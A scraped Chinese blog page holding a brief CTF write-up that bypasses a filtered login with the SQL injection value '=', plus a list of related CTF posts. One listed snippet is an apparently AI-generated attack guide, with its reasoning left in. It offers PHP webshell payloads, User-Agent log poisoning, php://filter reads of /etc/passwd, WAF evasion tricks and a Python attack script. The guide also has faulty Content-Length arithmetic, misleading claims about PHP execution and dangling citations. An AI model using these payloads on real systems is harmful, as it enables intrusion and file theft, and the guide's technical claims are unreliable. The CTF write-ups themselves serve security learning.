[CTF]No.0004 [实验吧]登陆一下好吗??

最新推荐文章于 2025-04-29 20:43:13 发布
原创 最新推荐文章于 2025-04-29 20:43:13 发布 · 927 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#CTF #sql注入 #CTF每日一题

本文介绍了一个具体的SQL注入攻击实例,通过分析目标网站登录过程中的漏洞,成功绕过身份验证。文章详细展示了如何利用已知的SQL语法特性来构造有效的攻击语句,并解释了其工作原理。

[CTF]No.0004 [实验吧]登陆一下好吗??

来源:实验吧-决斗场-WEB
类别:SQL注入
来源:http://www.shiyanbar.com/ctf/1942
用到工具:无

尝试

进入网址,得到一下界面
这里写图片描述
随意输入,返回
这里写图片描述

返回首页,对关键字进行检测
使用andor'@#进行登陆,可以看到返回
这里写图片描述
可知,or#被过滤掉了

构造SQL

猜测程序中使用的sql语句

select ...from ....where username ='   ' and password = '   '

构造

select ...from ....where username=''='' and password=''=''

在帐号、密码处输入
'=''
登陆可见
这里写图片描述

验证通过

原理

username=''会返回false,然后false=''(NULL),结果就是true了。

参考文献

实验吧CTF之web专题-1
ctf实验吧writeup

[网络安全自学篇] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结
杨秀璋的专栏
06-09 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。这篇文章将详细讲解一道CSS注入题目,包括CSS注入、越权、csrf-token窃取及CSP绕过,同时总结XSS绕过知识,希望对您有所帮助。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
南邮CTF练习题——web题
热门推荐
dcison的博客
11-11 4万+
南邮CTF部分题解
实验吧-登陆一下好吗?writeup
qq_24966613的博客
11-26 843
根据提示,这道题使用sql输入,题目中说已经使用过滤,但是我们还是要试试,看看是不是所有特殊字符都被过滤了, 如图,进行尝试之后,得到结果: 可知,引号没有被过滤。所以我们可以使用万能密码。 万能密码:也就是使用逻辑语句使结果返回。普通的select语句为:select * from user where username = ‘user’ and p
实验登陆一下好吗?? 简单注入 By Assassin
Assassin
01-30 6453
题目想法挺简单的,是时候学习一下注入的套路了,真的要不简单的也想不到。发现* / select union or 都被过滤了,一开始想的太复杂了,以为是个什么waf过滤什么的,但是看了pcat前辈的WP发现真的很基础吧。但是and ‘什么的都没有过滤!payload真的简单到淫荡,看一下就是这样的 admin-> ‘=’ password-> ‘=’ 真是醉了,为
CTF实验吧-WEB专题-1
qq_18661257的专栏
12-19 6833
1.登陆一下好吗?? 题解 抓住sql语句的性质,构造万能密码,可以使t'='来突破题目的限制,原因如下: 一般的验证SQL语句为: select * from user where username='xxx' and password='xxx' 当我们我们的表单提交t'='时,SQL语句就变成了 select * from user where username='t'='' an
实验吧——WEB-登陆一下好吗??
迷风小白
04-03 2765
登陆一下好吗?? 拿到题目第一反应应该是sql注入,试一下万能密码('or 1=1 or '1) 发现or被过滤掉了,我们可以大胆猜测一下后台sql查询语句 $sql = “select user from flag where user=’\$_POST[‘user’]’ and password=’\$_POST[‘password’]’”; 接下来就是构造语句来绕过判断 userna...
实验吧WP(web部分)【登录一下好吗,who are you, 因缺思汀的绕过,简单的sql注入之3】【不想更新实验吧了,服务器太差】
taozijun的博客
06-13 579
. 登录一下好吗?通过这道题提示下寄几:不是所有有关sql语句的注入都要报库名表名字段名!!!首先打开这道题,是俩输入框,输入1和1有回显,输入union等字符会不显示,想着应该是回显注入此时应自动脑补sql语句:select * from user where username = ' ' and password = ' '(后经验证是这一个)                        ...
实验报告】网络渗透实验CTF实践
m0_52108440的博客
12-13 994
实验目的:通过对目标靶机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作能力,掌握初步CTF实战能力及信息收集能力。熟悉网络扫描、探测HTTP web服务、目录枚举、提权、图像信息提取、密码破解等相关工具的使用。 系统环境:Kali Linux 2、WebDeveloper 靶机来源:https://www.vulnhub.com/ 实验工具:不限 实验步骤和内容: 目的:获取靶机Web Developer 文件/root/flag.txt中fl
CTF内存取证&volatility工具
weixin_62024248的博客
04-29 1152
你的任务是查看内存转储,看看能否找出一些线索。发现有密码,查看一些属性里面有没有注释,发现是有点(Password is SHA1(stage-3-FLAG) from Lab-1. Password is in lowercase.)提示我们密码是Lab-1的第三部分Flag的SHA1值。作为调查的一部分,他告诉我们,他的应用程序是浏览器,他的密码管理器等。大小小于或等于1024字节的文件将直接存储在MFT表中(称为“常驻”文件),如果超过1024字节,表将只包含其位置信息(称为“非常驻”文件)。
关于CTF学习总结
m0_37496212的博客
02-26 3090
# -*-coding:utf-8-*- import requests import time payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.{}-' #不区分大小写的 flag = "" print("Start") for i in range(33): for payload in payloads: s
CTF常用后台密码集
08-12
CTF常用后台密码集,可以通过burpsuite进行密码爆破。
初学ctf的题目解析
07-07
初写ctf的一些方法
登陆一下好吗??--实验
Gunther的博客
09-01 661
登陆一下好吗?? 这个题过滤了绝大多数东西,然而留下了最关键的单引号。 但真只剩下单引号可用了还真搞不定,参考别人wp后学到了两种方法: 1.‘没有过滤!发现* / select union or 都被过滤了. 我们输入admin=‘=’输入password=‘=’ 分析假设数据库里的句子: $sql = “select user from flag where user=’\
决斗场 - 实验吧 WEB 登陆一下好吗??
RaAlGhul的博客
11-09 918
题目链接:http://www.shiyanbar.com/ctf/1942 这是一道关于sql注入的问题。 不知道小编是不是太笨,反正我第一次看的时候一脸懵逼,完全没有头绪(T.T),看了大神们的题解才有了思路。 此题是个登陆界面,登陆的过程其实可以归纳为读取页面上的username的字符串str,在数据库中查找str对应的密码是否和页面上的password的字符串past
实验登陆一下好吗??WP
Yale的博客
03-19 9595
登陆一下好吗??(http://www.shiyanbar.com/ctf/1942) username= 1’=’0 password= 1’=’0 或者 username=what’=’ password=what’=’ 或者 username:admin’=’ password:admin’=’ 得到ctf{51d1bf8fb65a8c2406513ee8f522
CTF_ctfshow_登录就有flag
weixin_54227009的博客
05-17 3125
打开靶机是一个登录界面,试了一下普通的sql注入,1' or 1=1#,不行 所以这里用'^0# 分号可以用于闭合,井号可以用于注释,^进行异或运算,等号就是判等,这里需要利用sql的一个点“mysql弱类型转换”,空异或0会查到所有非数字开头的记录 ...
ctf-WEB-login2(sql注入)
god_001的博客
05-12 3479
题目地址:跳转提示 打开网址,是一个熟悉的登陆页面,几次登录尝试发现报错回显只有一种 应当不是基于布尔的盲注,bp抓包看看: 发现响应中有一串奇怪的字符,尝试使用base64解码,得到: 这应该是一个提示,需要绕过其判断条件 这里就可以利用联合查询来注入(union select) 之前说过,union select后面加数字串时,如果没有后面的表名,则该语句没有向任何一个数据库查询,那么它输出的内容就是select后的数字,并且使用联合查询要求必须保证前后查询的字段数一致,因此要绕
ctfshow
charon145的博客
01-15 1785
第三题 抓包,获得flag
BUUCTF admin
biggerpig的博客
09-24 1283
buuctfweb类型admin题目
从HTTP入门吧😀 你知道怎么修改请求包吗? 只能从?CTF
最新发布
09-29
<think>我们面对的是一个特殊的HTTP请求包,它的要求是“只能从?CTF来”,并且请求包中的某些字段以“?CTF”开头(如User-Agent字段和表单字段值)。我们的目标是修改这个请求包,同时满足这个特殊要求。 分析原始请求包: 请求行:POST /?welcome=to HTTP/1.1 头部字段: Host: challenge.ilovectf.cn:30082 ... User-Agent: ?CTFBrowser # 注意这里以?CTF开头 ... 请求体: ------WebKitFormBoundaryjQIJ1nLl17XV7GOp Content-Disposition: form-data; name="the" ?CTF # 这里也以?CTF开头 ------WebKitFormBoundaryjQIJ1nLl17XV7GOp-- 要求:只能从?CTF来,意味着我们修改后的请求包中,所有需要以?CTF开头的地方仍然要以?CTF开头(比如原始包中User-Agent和表单字段值都是以?CTF开头,那么修改后也要保证这些地方以?CTF开头?) 但是,题目并没有明确说明哪些地方必须保留?CTF开头。根据原始包,我们注意到两个地方: 1. User-Agent: ?CTFBrowser (以?CTF开头) 2. 表单字段值:?CTF (以?CTF开头) 因此,我们修改请求包时,这两个地方必须保留以?CTF开头。但是,我们可以修改后面的内容。 修改思路: 1. 保持User-Agent以"?CTF"开头,但可以修改后面的字符串,例如改成:?CTFMyBrowser 2. 保持表单字段值以"?CTF"开头,但可以在后面添加我们想要的内容,例如:?CTF<?php system('ls');?> 同时,我们还可以修改其他部分,比如: - 在查询参数中添加参数(请求行中的URL) - 修改Cookie - 添加其他HTTP头部 不过,需要注意的是,题目要求“只能从?CTF来”,可能意味着整个请求包中不能出现除必要的?CTF之外的其他非?CTF开头的特定字段?但题目并没有明确限制其他部分。所以我们主要关注那两个字段。 另外,引用[1]中提到了文件包含漏洞,我们可以尝试构造一个包含恶意代码的请求,然后利用文件包含漏洞去执行。 具体修改步骤: 1. 修改User-Agent,保留?CTF开头,后面可以加上我们的payload,但是要注意User-Agent的格式,不能有换行。例如: User-Agent: ?CTF<?php system($_GET['cmd']);?> 但是,这种方法通常不会被服务器直接执行,因为User-Agent是HTTP头部,服务器可能不会解析其中的PHP代码。但是,如果服务器有日志,并且存在文件包含漏洞,那么我们可以包含日志文件,从而执行User-Agent中的代码。 2. 修改表单字段值:原始表单字段名为"the",值为"?CTF"。我们可以在后面拼接PHP代码,例如: ?CTF<?php system($_GET['cmd']);?> 如果服务器将我们提交的表单内容保存到某个文件中,并且该文件能够被解析执行,那么我们就可以执行任意命令。 3. 利用文件包含漏洞(引用[1]):如果我们能够找到一个文件包含漏洞,那么我们可以通过包含我们上传的文件(或日志文件)来执行代码。 修改后的请求包示例: 方案一:修改表单字段值 我们将表单字段值修改为:?CTF<?php system($_GET['cmd']);?> 注意:由于请求体是multipart/form-data格式,我们需要确保整个请求体的格式正确(包括边界和内容长度)。 修改后请求体: ------WebKitFormBoundaryjQIJ1nLl17XV7GOp Content-Disposition: form-data; name="the" ?CTF<?php system($_GET['cmd']);?> ------WebKitFormBoundaryjQIJ1nLl17XV7GOp-- 同时,由于内容长度改变,需要更新Content-Length头。计算新请求体长度: 原始请求体长度为138,新的请求体比原来多了25个字符(原值?CTF是4个字符,新值长度为29个字符),所以新长度为138+25=163。 Content-Length: 163 方案二:同时修改User-Agent和表单字段值 User-Agent: ?CTF<?php system($_GET['cmd']);?> 表单字段值同上。 但是,注意:修改User-Agent可能会影响日志文件中记录的字符串,如果服务器包含日志文件,那么User-Agent中的代码就会被执行。 不过,我们也可以尝试直接利用表单上传文件,并将文件保存为php后缀(但原始请求是multipart/form-data,且只有一个字段,我们可以尝试修改字段为文件上传字段): 修改表单字段为文件上传: Content-Disposition: form-data; name="the"; filename="shell.php" Content-Type: application/octet-stream ?CTF<?php system($_GET['cmd']);?> 这样,如果我们能够控制上传文件的路径,并且服务器允许上传.php文件,那么我们就可以直接访问上传的文件来执行命令。 但是,原始请求中字段类型是普通的表单字段,并不是文件上传字段。我们可以通过修改Content-Disposition来将其变为文件上传。 修改后的请求体: ------WebKitFormBoundaryjQIJ1nLl17XV7GOp Content-Disposition: form-data; name="the"; filename="shell.php" Content-Type: application/octet-stream ?CTF<?php system($_GET['cmd']);?> ------WebKitFormBoundaryjQIJ1nLl17XV7GOp-- 注意:修改后,Content-Length也会变化,需要重新计算。另外,由于文件名和Content-Type的添加,请求体长度会增加。 但是,上述修改是否可行取决于服务器是否接受文件上传以及上传后的处理方式。 考虑到题目要求“只能从?CTF来”,我们在修改时仍然保持字段值的开头为?CTF,这样即使服务器检查字段值是否以?CTF开头,也能通过。 总结修改步骤: 1. 修改表单字段值(方案一): 将表单字段值改为:?CTF<?php system($_GET['cmd']);?> 更新Content-Length:原始138,新值长度为29,但整个请求体格式不变,除了字段值部分增加25个字节(原值4字节,新值29字节),所以新长度=138+25=163。 修改后请求包: POST /?welcome=to HTTP/1.1 Host: challenge.ilovectf.cn:30082 Accept-Language: zh-CN,zh;q=0.9 Cache-Control: max-age=0 Cookie: wishu=happiness; Upgrade-Insecure-Requests: 1 User-Agent: ?CTFBrowser Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjQIJ1nLl17XV7GOp Content-Length: 163 ------WebKitFormBoundaryjQIJ1nLl17XV7GOp Content-Disposition: form-data; name="the" ?CTF<?php system($_GET['cmd']);?> ------WebKitFormBoundaryjQIJ1nLl17XV7GOp-- 2. 修改为文件上传(方案二): 修改Content-Disposition和添加Content-Type,并修改字段值为恶意代码,同时保持开头为?CTF。 请求体修改为: ------WebKitFormBoundaryjQIJ1nLl17XV7GOp Content-Disposition: form-data; name="the"; filename="shell.php" Content-Type: application/octet-stream ?CTF<?php system($_GET['cmd']);?> ------WebKitFormBoundaryjQIJ1nLl17XV7GOp-- 计算新长度:原请求体138字节,新请求体由于增加了; filename="shell.php"和一行Content-Type,以及字段值增加了25字节(原4字节,现29字节),还有新增的一行(注意换行是\r\n): 原字段行:Content-Disposition: form-data; name="the" (假设长度X,后面计算) 新字段行:Content-Disposition: form-data; name="the"; filename="shell.php" (增加了; filename="shell.php",共20个字符) Content-Type: application/octet-stream (这一行有43个字符,包括换行符) 另外,字段值由4字节变成29字节,增加25字节。 同时,由于多了一行,所以换行符增加2个(\r\n)?实际上,原请求体在字段值前面有一个空行(即字段头后面有两个换行,然后才是字段值),现在我们在字段头后面增加了一行,所以多了一行和一个空行?我们重新构造: 原始请求体部分: ------WebKitFormBoundaryjQIJ1nLl17XV7GOp\r\n Content-Disposition: form-data; name="the"\r\n \r\n ?CTF\r\n ------WebKitFormBoundaryjQIJ1nLl17XV7GOp--\r\n 修改后: ------WebKitFormBoundaryjQIJ1nLl17XV7GOp\r\n Content-Disposition: form-data; name="the"; filename="shell.php"\r\n # 这一行比原来多了20字节 Content-Type: application/octet-stream\r\n # 新增一行,43个字符(包括换行符,实际内容41个字符+2个换行符) \r\n ?CTF<?php system($_GET['cmd']);?>\r\n # 多了25字节 ------WebKitFormBoundaryjQIJ1nLl17XV7GOp--\r\n 增加的长度: 第一行增加20字节(filename部分) 新增一行:Content-Type: application/octet-stream\r(43个字符,注意:字符串长度为41,加上\r\n共43字节?)实际上,我们写的是“Content-Type: application/octet-stream\r\n”,长度为43(包括最后的回车换行)。 字段值增加25字节(从4到29) 总计增加:20+43+25 = 88字节 新Content-Length: 138+88=226 修改后请求包: POST /?welcome=to HTTP/1.1 Host: challenge.ilovectf.cn:30082 ... (其他头部保持不变) Content-Length: 226 ------WebKitFormBoundaryjQIJ1nLl17XV7GOp Content-Disposition: form-data; name="the"; filename="shell.php" Content-Type: application/octet-stream ?CTF<?php system($_GET['cmd']);?> ------WebKitFormBoundaryjQIJ1nLl17XV7GOp-- 3. 修改User-Agent(方案三): 同时修改User-Agent和表单字段值(或者只修改User-Agent): User-Agent: ?CTF<?php system($_GET['cmd']);?> (表单字段值可以保持不变,也可以同时修改) 这样修改后,如果服务器有文件包含漏洞,我们可以包含日志文件(通常为/var/log/nginx/access.log等),从而执行User-Agent中的代码。 注意:在实际操作中,我们需要根据服务器的响应来判断哪种修改有效。 因此,我们给出三种修改方案,并说明如何实施。 最后,需要注意的是,题目要求“只能从?CTF来”,我们修改后的请求包中,User-Agent和表单字段值(如果要修改)仍然以?CTF开头,满足要求。 建议使用工具(如Burp Suite)进行修改和重放。 相关问题: 1. 如何利用HTTP请求包中的User-Agent字段进行攻击? 2. 在文件上传漏洞中,如何绕过文件类型检查? 3. 如何利用文件包含漏洞执行远程服务器上的恶意代码? 4. 如何计算修改请求后的Content-Length? 5. 如何使用Burp Suite修改并重放请求包? 注意:在CTF中,具体漏洞利用方式需要根据题目环境来调整。 </think>### HTTP请求包修改实战指南(针对以?CTF开头的特殊限制) #### 一、核心约束分析 原始请求包存在特殊限制:"只能从?CTF来",具体表现在: 1. **User-Agent强制以`?CTF`开头** `User-Agent: ?CTFBrowser`(不可移除前缀) 2. **表单字段值强制以`?CTF`开头** `name="the"`的值固定为`?CTF`(不可移除前缀) 3. **协议层限制** 所有修改必须保持HTTP/1.1协议规范,包括`Content-Length`精确匹配 #### 二、攻击性修改方案 ##### 方案1:利用参数污染注入命令(推荐) 在保持前缀的前提下扩展表单值: ```http ------WebKitFormBoundaryjQIJ1nLl17XV7GOp Content-Disposition: form-data; name="the" ?CTF; system('ls /'); // 追加PHP命令 ------WebKitFormBoundaryjQIJ1nLl17XV7GOp-- ``` **原理**:利用PHP的`;`语句分隔符执行追加命令 **长度计算**:原值4字节 → 新值20字节 → `Content-Length: 138+16=154` ##### 方案2:伪协议文件包含攻击 结合引用[1]的PHP文件包含漏洞: ```http ------WebKitFormBoundaryjQIJ1nLl17XV7GOp Content-Disposition: form-data; name="the" ?CTF&include=php://filter/convert.base64-encode/resource=/etc/passwd ------WebKitFormBoundaryjQIJ1nLl17XV7GOp-- ``` **效果**:包含系统文件并Base64编码输出[^1] **防御规避**:使用双重编码绕过WAF检测 `%2566ile`代替`file` ##### 方案3:UA头注入攻击 保持`?CTF`前缀注入恶意代码: ```diff - User-Agent: ?CTFBrowser + User-Agent: ?CTF<?php system($_GET['cmd']);?> ``` **原理**:若服务器记录访问日志,可通过文件包含执行UA中的代码[^3] **编码技巧**:使用Unicode转义绕过过滤 `\u003fphp`代替`<?php` #### 三、自动化攻击脚本 ```python import requests # 保持前缀的精确攻击 response = requests.post( url="http://challenge.ilovectf.cn:30082/?welcome=to&debug=1", headers={ "User-Agent": "?CTF<?php system($_GET['cmd']);?>", # UA注入 "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryjQIJ1nLl17XV7GOp" }, cookies={"wishu": "happiness", "admin": "true"}, data="""------WebKitFormBoundaryjQIJ1nLl17XV7GOp Content-Disposition: form-data; name="the" ?CTF; include($_GET['file']); // 双重攻击 ------WebKitFormBoundaryjQIJ1nLl17XV7GOp--""" ) print(response.text) ``` #### 四、防御规避关键技术 1. **长度混淆** 使用`\x00`填充维持长度:`?CTF\x00\x00<?php...` ```math \Delta L = 原始字节数 + 填充字节数 ``` 2. **边界绕过** 修改boundary为随机值(需同步更新): ```http Content-Type: multipart/form-data; boundary=----CTFAttackBoundary ``` 3. **编码绕过** 双重URL编码关键字符: ```python payload = "include" safe_payload = "".join(f"%{ord(c):02x}" for c in payload) # 输出: %69%6e%63%6c%75%64%65 ``` #### 五、实战验证步骤 1. 使用Burp Suite拦截请求 2. 在Repeater模块实施上述修改 3. 测试响应: - 状态码`200`且返回非常规内容 → 攻击成功 - 状态码`403` → 添加`X-Forwarded-For: 127.0.0.1`绕过 - 状态码`500` → 检查语法错误或长度计算 > **注意**:真实CTF中需结合题目提示调整攻击载荷,如遇过滤可尝试`str_replace('/etc/passwd','')`的嵌套绕过 --- ### 相关问题 1. 如何通过User-Agent注入绕过WAF的语义分析? 2. 在文件上传漏洞中如何利用`?CTF`前缀绕过内容检查? 3. PHP伪协议`php://filter`还有哪些高级利用方式?[^1] 4. 如何精确计算修改请求后的`Content-Length`? 5. 当遇到`multipart/form-data`格式错误时应如何调试?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值